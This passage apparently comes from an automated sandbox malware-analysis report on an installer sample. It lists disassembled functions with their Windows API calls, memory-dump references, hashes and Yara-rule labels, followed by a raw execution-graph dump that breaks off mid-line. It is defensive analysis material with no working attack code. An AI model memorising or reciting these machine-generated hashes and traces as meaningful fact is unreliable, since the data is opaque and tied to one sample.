                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                  Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                  • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                  • String ID: !N~
                                                                                                                                                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                  • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                  • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                  Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                  • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                  • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                  Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                  • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                  • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                  Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:3.3%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:3.5%
                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:48
                                                                                                                                                                                                                                                                  execution_graph 101939 d35650 101948 cfe3d5 101939->101948 101941 d35666 101947 d356e1 101941->101947 101957 cfaa65 9 API calls 101941->101957 101944 d356c1 101944->101947 101958 d5247e 8 API calls 101944->101958 101945 d361d7 101947->101945 101959 d53fe1 81 API calls __wsopen_s 101947->101959 101949 cfe3f6 101948->101949 101950 cfe3e3 101948->101950 101952 cfe3fb 101949->101952 101953 cfe429 101949->101953 101960 ceb4c8 101950->101960 101964 d0014b 101952->101964 101954 ceb4c8 8 API calls 101953->101954 101956 cfe3ed 101954->101956 101956->101941 101957->101944 101958->101947 101959->101945 101961 ceb4dc 101960->101961 101962 ceb4d6 101960->101962 101961->101956 101962->101961 101973 cebed9 101962->101973 101965 d00150 ___std_exception_copy 101964->101965 101966 d0016a 101965->101966 101969 d0016c 101965->101969 101989 d0521d 7 API calls 2 library calls 101965->101989 101966->101956 101968 d009dd 101991 d03614 RaiseException 101968->101991 101969->101968 101990 d03614 RaiseException 101969->101990 101972 d009fa 101972->101956 101974 cebefc __fread_nolock 101973->101974 101975 cebeed 101973->101975 101974->101961 101975->101974 101977 d0017b 101975->101977 101978 d0014b ___std_exception_copy 101977->101978 101979 d0016a 101978->101979 101981 d0016c 101978->101981 101986 d0521d 7 API calls 2 library calls 101978->101986 101979->101974 101982 d009dd 101981->101982 101987 d03614 RaiseException 101981->101987 101988 d03614 RaiseException 101982->101988 101985 d009fa 101985->101974 101986->101978 101987->101982 101988->101985 101989->101965 101990->101968 101991->101972 101992 d36555 101993 d0014b 8 API calls 101992->101993 101995 d3655c 101993->101995 101994 d36575 __fread_nolock 101997 d0017b 8 API calls 101994->101997 101995->101994 101996 d0017b 8 API calls 101995->101996 101996->101994 101998 d3659a 101997->101998 101999 ce1044 102004 ce2793 101999->102004 102001 ce104a 102040 d00413 29 API calls __onexit 102001->102040 102003 ce1054 102041 ce2a38 102004->102041 102008 ce280a 102051 cebf73 102008->102051 102011 cebf73 8 API calls 102012 ce281e 102011->102012 102013 cebf73 8 API calls 102012->102013 102014 ce2828 102013->102014 102015 cebf73 8 API calls 102014->102015 102016 ce2866 102015->102016 102017 cebf73 8 API calls 102016->102017 102018 ce2932 102017->102018 102056 ce2dbc 102018->102056 102022 ce2964 102023 cebf73 8 API calls 102022->102023 102024 ce296e 102023->102024 102083 cf3160 102024->102083 102026 ce2999 102093 ce3166 102026->102093 102028 ce29b5 102029 ce29c5 GetStdHandle 102028->102029 102030 ce2a1a 102029->102030 102031 d239e7 102029->102031 102034 ce2a27 OleInitialize 102030->102034 102031->102030 102032 d239f0 102031->102032 102033 d0014b 8 API calls 102032->102033 102035 d239f7 102033->102035 102034->102001 102100 d50ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 102035->102100 102037 d23a00 102101 d512eb CreateThread 102037->102101 102039 d23a0c CloseHandle 102039->102030 102040->102003 102102 ce2a91 102041->102102 102044 ce2a91 8 API calls 102045 ce2a70 102044->102045 102046 cebf73 8 API calls 102045->102046 102047 ce2a7c 102046->102047 102109 ce8577 102047->102109 102049 ce27c9 102050 ce327e 6 API calls 102049->102050 102050->102008 102052 d0017b 8 API calls 102051->102052 102053 cebf88 102052->102053 102054 d0014b 8 API calls 102053->102054 102055 ce2814 102054->102055 102055->102011 102057 cebf73 8 API calls 102056->102057 102058 ce2dcc 102057->102058 102059 cebf73 8 API calls 102058->102059 102060 ce2dd4 102059->102060 102132 ce81d6 102060->102132 102063 ce81d6 8 API calls 102064 ce2de4 102063->102064 102065 cebf73 8 API calls 102064->102065 102066 ce2def 102065->102066 102067 d0014b 8 API calls 102066->102067 102068 ce293c 102067->102068 102069 ce3205 102068->102069 102070 ce3213 102069->102070 102071 cebf73 8 API calls 102070->102071 102072 ce321e 102071->102072 102073 cebf73 8 API calls 102072->102073 102074 ce3229 102073->102074 102075 cebf73 8 API calls 102074->102075 102076 ce3234 102075->102076 102077 cebf73 8 API calls 102076->102077 102078 ce323f 102077->102078 102079 ce81d6 8 API calls 102078->102079 102080 ce324a 102079->102080 102081 d0014b 8 API calls 102080->102081 102082 ce3251 RegisterWindowMessageW 102081->102082 102082->102022 102084 cf317d 102083->102084 102085 cf31a1 102083->102085 102092 cf318e 102084->102092 102137 d005b2 5 API calls __Init_thread_wait 102084->102137 102135 d005b2 5 API calls __Init_thread_wait 102085->102135 102088 cf31ab 102088->102084 102136 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102088->102136 102089 cf9f47 102089->102092 102138 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102089->102138 102092->102026 102094 ce3176 102093->102094 102095 d23c8f 102093->102095 102096 d0014b 8 API calls 102094->102096 102139 d53c4e 8 API calls 102095->102139 102098 ce317e 102096->102098 102098->102028 102099 d23c9a 102100->102037 102101->102039 102140 d512d1 14 API calls 102101->102140 102103 cebf73 8 API calls 102102->102103 102104 ce2a9c 102103->102104 102105 cebf73 8 API calls 102104->102105 102106 ce2aa4 102105->102106 102107 cebf73 8 API calls 102106->102107 102108 ce2a66 102107->102108 102108->102044 102110 d26610 102109->102110 102111 ce8587 _wcslen 102109->102111 102122 ceadf4 102110->102122 102114 ce859d 102111->102114 102115 ce85c2 102111->102115 102113 d26619 102113->102113 102121 ce88e8 8 API calls 102114->102121 102117 d0014b 8 API calls 102115->102117 102119 ce85ce 102117->102119 102118 ce85a5 __fread_nolock 102118->102049 102120 d0017b 8 API calls 102119->102120 102120->102118 102121->102118 102123 ceae0b __fread_nolock 102122->102123 102124 ceae02 102122->102124 102123->102113 102124->102123 102126 cec2c9 102124->102126 102127 cec2dc 102126->102127 102131 cec2d9 __fread_nolock 102126->102131 102128 d0014b 8 API calls 102127->102128 102129 cec2e7 102128->102129 102130 d0017b 8 API calls 102129->102130 102130->102131 102131->102123 102133 cebf73 8 API calls 102132->102133 102134 ce2ddc 102133->102134 102134->102063 102135->102088 102136->102084 102137->102089 102138->102092 102139->102099 102141 d1947a 102142 d19487 102141->102142 102143 d1949f 102141->102143 102198 d0f649 20 API calls __dosmaperr 102142->102198 102147 d194fa 102143->102147 102155 d19497 102143->102155 102200 d20144 21 API calls 2 library calls 102143->102200 102145 d1948c 102199 d12b5c 26 API calls pre_c_initialization 102145->102199 102161 d0dcc5 102147->102161 102150 d19512 102168 d18fb2 102150->102168 102152 d19519 102153 d0dcc5 __fread_nolock 26 API calls 102152->102153 102152->102155 102154 d19545 102153->102154 102154->102155 102156 d0dcc5 __fread_nolock 26 API calls 102154->102156 102157 d19553 102156->102157 102157->102155 102158 d0dcc5 __fread_nolock 26 API calls 102157->102158 102159 d19563 102158->102159 102160 d0dcc5 __fread_nolock 26 API calls 102159->102160 102160->102155 102162 d0dcd1 102161->102162 102163 d0dce6 102161->102163 102201 d0f649 20 API calls __dosmaperr 102162->102201 102163->102150 102165 d0dcd6 102202 d12b5c 26 API calls pre_c_initialization 102165->102202 102167 d0dce1 102167->102150 102169 d18fbe ___DestructExceptionObject 102168->102169 102170 d18fc6 102169->102170 102171 d18fde 102169->102171 102269 d0f636 20 API calls __dosmaperr 102170->102269 102172 d190a4 102171->102172 102176 d19017 102171->102176 102276 d0f636 20 API calls __dosmaperr 102172->102276 102175 d18fcb 102270 d0f649 20 API calls __dosmaperr 102175->102270 102179 d19026 102176->102179 102180 d1903b 102176->102180 102177 d190a9 102277 d0f649 20 API calls __dosmaperr 102177->102277 102271 d0f636 20 API calls __dosmaperr 102179->102271 102203 d154ba EnterCriticalSection 102180->102203 102184 d19033 102278 d12b5c 26 API calls pre_c_initialization 102184->102278 102185 d1902b 102272 d0f649 20 API calls __dosmaperr 102185->102272 102186 d19041 102189 d19072 102186->102189 102190 d1905d 102186->102190 102187 d18fd3 __wsopen_s 102187->102152 102204 d190c5 102189->102204 102273 d0f649 20 API calls __dosmaperr 102190->102273 102194 d1906d 102275 d1909c LeaveCriticalSection __wsopen_s 102194->102275 102195 d19062 102274 d0f636 20 API calls __dosmaperr 102195->102274 102198->102145 102199->102155 102200->102147 102201->102165 102202->102167 102203->102186 102205 d190d7 102204->102205 102206 d190ef 102204->102206 102295 d0f636 20 API calls __dosmaperr 102205->102295 102208 d19459 102206->102208 102211 d19134 102206->102211 102318 d0f636 20 API calls __dosmaperr 102208->102318 102209 d190dc 102296 d0f649 20 API calls __dosmaperr 102209->102296 102214 d1913f 102211->102214 102217 d190e4 102211->102217 102222 d1916f 102211->102222 102213 d1945e 102319 d0f649 20 API calls __dosmaperr 102213->102319 102297 d0f636 20 API calls __dosmaperr 102214->102297 102217->102194 102218 d1914c 102320 d12b5c 26 API calls pre_c_initialization 102218->102320 102219 d19144 102298 d0f649 20 API calls __dosmaperr 102219->102298 102223 d19188 102222->102223 102224 d191ca 102222->102224 102225 d191ae 102222->102225 102223->102225 102231 d19195 102223->102231 102279 d13b93 102224->102279 102299 d0f636 20 API calls __dosmaperr 102225->102299 102227 d191b3 102300 d0f649 20 API calls __dosmaperr 102227->102300 102286 d1fc1b 102231->102286 102233 d191ba 102301 d12b5c 26 API calls pre_c_initialization 102233->102301 102234 d19333 102237 d193a9 102234->102237 102240 d1934c GetConsoleMode 102234->102240 102239 d193ad ReadFile 102237->102239 102238 d191ea 102241 d12d38 _free 20 API calls 102238->102241 102242 d19421 GetLastError 102239->102242 102243 d193c7 102239->102243 102240->102237 102244 d1935d 102240->102244 102245 d191f1 102241->102245 102246 d19385 102242->102246 102247 d1942e 102242->102247 102243->102242 102248 d1939e 102243->102248 102244->102239 102249 d19363 ReadConsoleW 102244->102249 102250 d19216 102245->102250 102251 d191fb 102245->102251 102267 d191c5 __fread_nolock 102246->102267 102313 d0f613 20 API calls __dosmaperr 102246->102313 102316 d0f649 20 API calls __dosmaperr 102247->102316 102262 d19403 102248->102262 102263 d193ec 102248->102263 102248->102267 102249->102248 102255 d1937f GetLastError 102249->102255 102310 d197a4 102250->102310 102308 d0f649 20 API calls __dosmaperr 102251->102308 102255->102246 102256 d12d38 _free 20 API calls 102256->102217 102257 d19200 102309 d0f636 20 API calls __dosmaperr 102257->102309 102258 d19433 102317 d0f636 20 API calls __dosmaperr 102258->102317 102265 d1941a 102262->102265 102262->102267 102314 d18de1 31 API calls 3 library calls 102263->102314 102315 d18c21 29 API calls __wsopen_s 102265->102315 102267->102256 102268 d1941f 102268->102267 102269->102175 102270->102187 102271->102185 102272->102184 102273->102195 102274->102194 102275->102187 102276->102177 102277->102184 102278->102187 102280 d13bd1 102279->102280 102284 d13ba1 pre_c_initialization 102279->102284 102322 d0f649 20 API calls __dosmaperr 102280->102322 102282 d13bbc RtlAllocateHeap 102283 d13bcf 102282->102283 102282->102284 102302 d12d38 102283->102302 102284->102280 102284->102282 102321 d0521d 7 API calls 2 library calls 102284->102321 102287 d1fc35 102286->102287 102288 d1fc28 102286->102288 102290 d1fc41 102287->102290 102324 d0f649 20 API calls __dosmaperr 102287->102324 102323 d0f649 20 API calls __dosmaperr 102288->102323 102290->102234 102292 d1fc62 102325 d12b5c 26 API calls pre_c_initialization 102292->102325 102293 d1fc2d 102293->102234 102295->102209 102296->102217 102297->102219 102298->102218 102299->102227 102300->102233 102301->102267 102303 d12d6c __dosmaperr 102302->102303 102304 d12d43 RtlFreeHeap 102302->102304 102303->102238 102304->102303 102305 d12d58 102304->102305 102326 d0f649 20 API calls __dosmaperr 102305->102326 102307 d12d5e GetLastError 102307->102303 102308->102257 102309->102267 102327 d1970b 102310->102327 102313->102267 102314->102267 102315->102268 102316->102258 102317->102267 102318->102213 102319->102218 102320->102217 102321->102284 102322->102283 102323->102293 102324->102292 102325->102293 102326->102307 102336 d15737 102327->102336 102329 d1971d 102330 d19725 102329->102330 102331 d19736 SetFilePointerEx 102329->102331 102349 d0f649 20 API calls __dosmaperr 102330->102349 102333 d1972a 102331->102333 102334 d1974e GetLastError 102331->102334 102333->102231 102350 d0f613 20 API calls __dosmaperr 102334->102350 102337 d15744 102336->102337 102338 d15759 102336->102338 102351 d0f636 20 API calls __dosmaperr 102337->102351 102344 d1577e 102338->102344 102353 d0f636 20 API calls __dosmaperr 102338->102353 102341 d15749 102352 d0f649 20 API calls __dosmaperr 102341->102352 102342 d15789 102354 d0f649 20 API calls __dosmaperr 102342->102354 102344->102329 102346 d15751 102346->102329 102347 d15791 102355 d12b5c 26 API calls pre_c_initialization 102347->102355 102349->102333 102350->102333 102351->102341 102352->102346 102353->102342 102354->102347 102355->102346 102356 cef5e5 102359 cecab0 102356->102359 102360 cecacb 102359->102360 102361 d314be 102360->102361 102362 d3150c 102360->102362 102383 cecaf0 102360->102383 102365 d314c8 102361->102365 102368 d314d5 102361->102368 102361->102383 102431 d662ff 207 API calls 2 library calls 102362->102431 102429 d66790 207 API calls 102365->102429 102382 cecdc0 102368->102382 102430 d66c2d 207 